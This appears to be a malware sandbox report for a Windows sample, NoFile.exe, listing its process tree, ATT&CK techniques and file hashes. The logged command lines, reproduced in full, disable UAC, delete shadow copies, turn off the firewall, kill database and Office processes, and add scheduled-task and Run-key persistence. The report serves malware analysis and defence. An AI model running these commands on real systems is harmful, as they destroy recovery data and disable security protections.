cmd.exe systeminfo.exe PID 2628 wrote to memory of 3324 2628 cmd.exe systeminfo.exe PID 2628 wrote to memory of 3324 2628 cmd.exe systeminfo.exe PID 2628 wrote to memory of 1576 2628 cmd.exe find.exe PID 2628 wrote to memory of 1576 2628 cmd.exe find.exe PID 2628 wrote to memory of 1576 2628 cmd.exe find.exe PID 804 wrote to memory of 1556 804 cmd.exe tasklist.exe PID 804 wrote to memory of 1556 804 cmd.exe tasklist.exe PID 804 wrote to memory of 1556 804 cmd.exe tasklist.exe PID 804 wrote to memory of 3260 804 cmd.exe find.exe PID 804 wrote to memory of 3260 804 cmd.exe find.exe PID 804 wrote to memory of 3260 804 cmd.exe find.exe PID 804 wrote to memory of 3780 804 cmd.exe timeout.exe PID 804 wrote to memory of 3780 804 cmd.exe timeout.exe PID 804 wrote to memory of 3780 804 cmd.exe timeout.exe PID 3436 wrote to memory of 1004 3436 NoFile.exe cmd.exe PID 3436 wrote to memory of 1004 3436 NoFile.exe cmd.exe PID 3436 wrote to memory of 1004 3436 NoFile.exe cmd.exe PID 1004 wrote to memory of 616 1004 cmd.exe systeminfo.exe PID 1004 wrote to memory of 616 1004 cmd.exe systeminfo.exe PID 1004 wrote to memory of 616 1004 cmd.exe systeminfo.exe PID 1004 wrote to memory of 3796 1004 cmd.exe find.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\NoFile.exe"C:\Users\Admin\AppData\Local\Temp\NoFile.exe"1⤵
- Drops startup file
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tasklist /v /fo csv | findstr /i "dcdcf"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\tasklist.exetasklist /v /fo csv3⤵
- Enumerates processes with tasklist
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\findstr.exefindstr /i "dcdcf"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ver2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&t2_svc.bat2⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\v9_svc.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /C echo C:\Users\Admin\AppData\h4_svc.bat4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\h4_svc.bat" "4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\tasklist.exetasklist /v5⤵
- Enumerates processes with tasklist
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\find.exefind /I /c "dcdcf"5⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "ImageName eq NoFile.exe" /fo csv5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\find.exefind /I "NoFile.exe"5⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "ImageName eq NoFile.exe" /fo csv5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\find.exefind /I "NoFile.exe"5⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "ImageName eq NoFile.exe" /fo csv5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\find.exefind /I "NoFile.exe"5⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "ImageName eq NoFile.exe" /fo csv5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\find.exefind /I "NoFile.exe"5⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "ImageName eq NoFile.exe" /fo csv5⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I "NoFile.exe"5⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "ImageName eq NoFile.exe" /fo csv5⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I "NoFile.exe"5⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "ImageName eq NoFile.exe" /fo csv5⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I "NoFile.exe"5⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "ImageName eq NoFile.exe" /fo csv5⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I "NoFile.exe"5⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "ImageName eq NoFile.exe" /fo csv5⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I "NoFile.exe"5⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\%username%\AppData\t2_svc.bat'" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\Admin\AppData\t2_svc.bat'" /f3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c nslookup myip.opendns.com. resolver1.opendns.com2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\nslookup.exenslookup myip.opendns.com. resolver1.opendns.com3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c echo %date%-%time%2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c systeminfo|find /i "os name"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\systeminfo.exesysteminfo3⤵
- Gathers system information
-
C:\Windows\SysWOW64\find.exefind /i "os name"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c systeminfo|find /i "original"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\systeminfo.exesysteminfo3⤵
- Gathers system information
-
C:\Windows\SysWOW64\find.exefind /i "original"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes2⤵
-
C:\Windows\SysWOW64\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f3⤵
- Modifies registry key
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set currentprofile state off3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall set rule group="Network Discovery" new enable=Yes3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /im notepad.exe&taskkill /im msftesql.exe&taskkill /im sqlagent.exe&taskkill /im sqlbrowser.exe&taskkill /im sqlservr.exe&taskkill /im sqlwriter.exe&taskkill /im oracle.exe&taskkill /im ocssd.exe&taskkill /im dbsnmp.exe&taskkill /im synctime.exe&taskkill /im agntsvc.exe&taskkill /im mydesktopqos.exe&taskkill /im isqlplussvc.exe&taskkill /im xfssvccon.exe&taskkill /im mydesktopservice.exe&taskkill /im ocautoupds.exe&taskkill /im agntsvc.exe&taskkill /im encsvc.exe&taskkill /im firefoxconfig.exe&taskkill /im tbirdconfig.exe&taskkill /im ocomm.exe&taskkill /im mysqld.exe&taskkill /im mysqld-nt.exe&taskkill /im mysqld-opt.exe&taskkill /im dbeng50.exe&taskkill /im sqbcoreservice.exe&taskkill /im excel.exe&taskkill /im infopath.exe&taskkill /im msaccess.exe&taskkill /im mspub.exe&taskkill /im onenote.exe&taskkill /im outlook.exe&taskkill /im powerpnt.exe&taskkill /im steam.exe&taskkill /im thebat.exe&taskkill /im thebat64.exe&taskkill /im thunderbird.exe&taskkill /im visio.exe&taskkill /im winword.exe&taskkill /im wordpad.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im notepad.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im msftesql.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im sqlagent.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im sqlbrowser.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im sqlservr.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im sqlwriter.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im oracle.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im ocssd.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im dbsnmp.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im synctime.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im agntsvc.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im mydesktopqos.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im isqlplussvc.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im xfssvccon.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im mydesktopservice.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im ocautoupds.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im agntsvc.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im encsvc.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im firefoxconfig.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im tbirdconfig.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im ocomm.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im mysqld.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im mysqld-nt.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im mysqld-opt.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im dbeng50.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im sqbcoreservice.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im excel.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im infopath.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im msaccess.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im mspub.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im onenote.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im outlook.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im powerpnt.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im steam.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im thebat.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im thebat64.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im thunderbird.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im visio.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im winword.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im wordpad.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f® delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f2⤵
-
C:\Windows\SysWOW64\reg.exereg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f3⤵
-
C:\Windows\SysWOW64\reg.exereg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f3⤵
- Modifies registry key
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /t REG_SZ /d c:\$Recycle.Bin\RCRU_64.exe /f® add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /t REG_SZ /d c:\$Recycle.Bin\RCRU_64.exe /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /t REG_SZ /d c:\$Recycle.Bin\RCRU_64.exe /f3⤵
- Adds Run key to start application
- Modifies registry key
-
C:\Windows\SysWOW64\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /t REG_SZ /d c:\$Recycle.Bin\RCRU_64.exe /f3⤵
- Adds Run key to start application
-
C:\Windows\system32\MusNotifyIcon.exe%systemroot%\system32\MusNotifyIcon.exe NotifyTrayIcon 131⤵
- Checks processor information in registry
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
-
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Persistence
Modify Existing Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
Bypass User Account Control
1Disabling Security Tools
1Modify Registry
3File Deletion
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\h4_svc.batMD5
ead5cad574fa019df970900e07e76afd
SHA12bf7be0a9b3f174eaccd0a89310699f7b15fed02
SHA2567de41bf6be3b821fb2ff4a2f8b7f6772d407c0bdf1bccfd9c19207ab1f07440f
SHA51216aa662012c6ed8c50cb45f0487ff10081201c0091ccd86b4ae5235e72ef696a188f9acb5f91e8a59b95cac7b5d8b1c89328f32714f51d201db94e0a0aae5c87
-
C:\Users\Admin\AppData\t2_svc.batMD5
702f5dc6f9dec28c8c9b7b6885c9fe09
SHA1dbb85da6de899deb21ce0a8f25c1726cd19e49e8
SHA25620bf5224af318c449407c99e5f4628f71b874463a1cb777031a43b6236ab97e9
SHA512fa4bfc3ac77561585d03bf62e7bb4de0602cf442b5c54b70945f8c75114d111559f50ad36026e2bb1027323f7f50130b7c60bee22835400a8a07feab436ccff7
-
C:\Users\Admin\AppData\v9_svc.vbsMD5
e9c50acda9063b2462697bdbd0a0dfe2
SHA1d1a2bc54905ce0e9121f8e5c249e0527f2190b7e
SHA256f236c75a867944ce27e123b3aaf3a465084bc6135dc453f7f4aacb1cbf9946bd
SHA512d5cd841b82867e323f5cd28f97c9a27ea32be1b3793cb7ddff1ccc3c0559c6b3758f6366d259eda2265431f67a1eebe41dcfb2047ee94c515eb458af6311b8a9